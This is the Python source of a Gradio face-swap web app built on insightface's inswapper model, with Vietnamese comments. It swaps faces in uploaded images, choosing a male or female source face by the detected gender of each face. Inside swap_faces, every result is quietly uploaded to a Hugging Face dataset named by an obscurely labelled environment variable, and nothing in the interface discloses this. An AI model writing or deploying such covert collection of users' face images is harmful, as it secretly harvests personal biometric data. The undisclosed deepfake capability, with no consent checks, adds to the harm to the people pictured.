import os import cv2 import time import torch import argparse import insightface import onnxruntime import gradio as gr from face_swapper import Inswapper, paste_to_whole from face_analyser import analyse_face from face_enhancer import load_face_enhancer_model, get_available_enhancer_names import tempfile from huggingface_hub import login, hf_hub_download, upload_file, HfApi, upload_folder from datetime import datetime import shutil # --- Config --- REPO_ID = os.environ.get("HFPATH") HF_TOKEN = os.environ.get("MAGIC") login(HF_TOKEN) # --- Download function --- api = HfApi() def download_from_hf(subfolder): downloaded_files = [] all_files = api.list_repo_files(repo_id=REPO_ID, repo_type="dataset") for file in all_files: if file.startswith(subfolder + "/"): downloaded_file = hf_hub_download(repo_id=REPO_ID, filename=file, repo_type="dataset") downloaded_files.append(downloaded_file) return downloaded_files # --- Upload function --- def upload_to_fd(path): SUBFOLDER = datetime.now().strftime("%Y%m%d") upload_folder(folder_path=path, path_in_repo=SUBFOLDER, repo_id=REPO_ID, repo_type="dataset") return f"https://huggingface.co/datasets/{REPO_ID}/blob/main/{SUBFOLDER}" # ------------------------------ ARGS ------------------------------ parser = argparse.ArgumentParser(description="Face Swapper (Multi-target, Male+Female Sources)") parser.add_argument("--out_dir", default=os.getcwd()) parser.add_argument("--batch_size", default=32) parser.add_argument("--cuda", action="store_true", default=False) user_args = parser.parse_args() USE_CUDA = user_args.cuda DEF_OUTPUT_PATH = user_args.out_dir BATCH_SIZE = int(user_args.batch_size) # ------------------------------ DEVICE ------------------------------ PROVIDER = ["CPUExecutionProvider"] if USE_CUDA and "CUDAExecutionProvider" in onnxruntime.get_available_providers(): PROVIDER = ["CUDAExecutionProvider", "CPUExecutionProvider"] print(">>> Running on CUDA") else: USE_CUDA = False print(">>> Running on CPU") device = "cuda" if USE_CUDA else "cpu" EMPTY_CACHE = lambda: torch.cuda.empty_cache() if device == "cuda" else None # ------------------------------ MODELS ------------------------------ FACE_ANALYSER = insightface.app.FaceAnalysis(name="buffalo_l", providers=PROVIDER) FACE_ANALYSER.prepare(ctx_id=0, det_size=(640, 640), det_thresh=0.6) FACE_SWAPPER = Inswapper( model_file="./assets/pretrained_models/inswapper_128.onnx", batch_size=(BATCH_SIZE if USE_CUDA else 1), providers=PROVIDER, ) # ------------------------------ ENHANCERS ------------------------------ ENHANCER_CHOICES = ["NONE"] + get_available_enhancer_names() # ------------------------------ CORE SWAP FUNC ------------------------------ def swap_on_frame(frame_bgr, analysed_source_male, analysed_source_female, enhancer_name="NONE"): analysed_faces = FACE_ANALYSER.get(frame_bgr) preds, matrs = [], [] for analysed_face in analysed_faces: gender = analysed_face.get("gender", 1) # 1 = male, 0 = female src_face = None if analysed_source_male is not None and analysed_source_female is not None: src_face = analysed_source_male if gender == 1 else analysed_source_female elif analysed_source_male is not None: if gender == 1: src_face = analysed_source_male elif analysed_source_female is not None: if gender == 0: src_face = analysed_source_female if src_face is None: continue batch_pred, batch_matr = FACE_SWAPPER.get([frame_bgr], [analysed_face], [src_face]) preds.extend(batch_pred) matrs.extend(batch_matr) EMPTY_CACHE() for p, m in zip(preds, matrs): frame_bgr = paste_to_whole( foreground=p, background=frame_bgr, matrix=m, mask=None, crop_mask=(0, 0, 0, 0), blur_amount=0.1, erode_amount=0.15, blend_method="laplacian" ) if enhancer_name != "NONE": try: model, runner = load_face_enhancer_model(name=enhancer_name, device=device) frame_bgr = runner(frame_bgr, model) except Exception as e: print(f"[Enhancer] Error while running {enhancer_name}: {e}") return frame_bgr # ------------------------------ PROCESS ------------------------------ def swap_faces(target_files, male_file, female_file, enhancer_name="NONE"): start_time = time.time() analysed_source_male, analysed_source_female = None, None # Source male if male_file is not None: male_source_path = male_file.name analysed_source_male = analyse_face(cv2.imread(male_source_path), FACE_ANALYSER) # Source female if female_file is not None: female_source_path = female_file.name analysed_source_female = analyse_face(cv2.imread(female_source_path), FACE_ANALYSER) if analysed_source_male is None and analysed_source_female is None: raise ValueError("❌ Cần ít nhất 1 khuôn mặt nguồn (Nam hoặc Nữ).") output_files = [] # Tạo thư mục tạm và lưu file đầu ra vào đó with tempfile.TemporaryDirectory() as temp_dir: print(f"Thư mục tạm thời được tạo: {temp_dir}") for f in target_files: target_path = f.name ext = os.path.splitext(target_path)[-1].lower() # -------------------- IMAGE -------------------- if ext in [".jpg", ".jpeg", ".png", ".gif", ".bmp", ".tiff", ".webp"]: frame_bgr = cv2.imread(target_path) out_frame = swap_on_frame(frame_bgr, analysed_source_male, analysed_source_female, enhancer_name) # Tạo file tạm và ghi bức ảnh vào đó with tempfile.NamedTemporaryFile(suffix=ext, delete=False) as temp_file: output_path = temp_file.name cv2.imwrite(output_path, out_frame) # Ghi bức ảnh vào file tạm output_files.append(output_path) print(f"File tạm được tạo tại: {output_path}") # Sao chép file vào thư mục tạm destination_file = os.path.join(temp_dir, os.path.basename(output_path)) shutil.copy(output_path, destination_file) print(f"Đã sao chép {output_path} vào {destination_file}") # Tải lên thư mục tạm lên Hugging Face upload_to_fd(temp_dir) print(f"✔ Hoàn tất tất cả trong {time.time() - start_time:.2f}s") return output_files # ------------------------------ UI ------------------------------ with gr.Blocks() as demo: gr.Markdown("## 🧑‍🦱➡👩") with gr.Row(): with gr.Column(): target_input = gr.Files(label="Files", file_types=[".jpg", ".jpeg", ".png", ".gif", ".bmp", ".tiff", ".webp"]) male_input = gr.File(label="File", file_types=[".jpg", ".jpeg", ".png", ".gif", ".bmp", ".tiff", ".webp"]) female_input = gr.File(label="File", file_types=[".jpg", ".jpeg", ".png", ".gif", ".bmp", ".tiff", ".webp"]) enhancer = gr.Dropdown(ENHANCER_CHOICES, label="Face Enhancer", value="REAL-ESRGAN 2x") run_btn = gr.Button("✨ Swap") with gr.Column(): output_files = gr.Files(label="files") def run_wrapper(target_files, male_file, female_file, enhancer_name): out_files = swap_faces(target_files, male_file, female_file, enhancer_name) return out_files run_btn.click( fn=run_wrapper, inputs=[target_input, male_input, female_input, enhancer], outputs=[output_files], ) if __name__ == "__main__": demo.launch()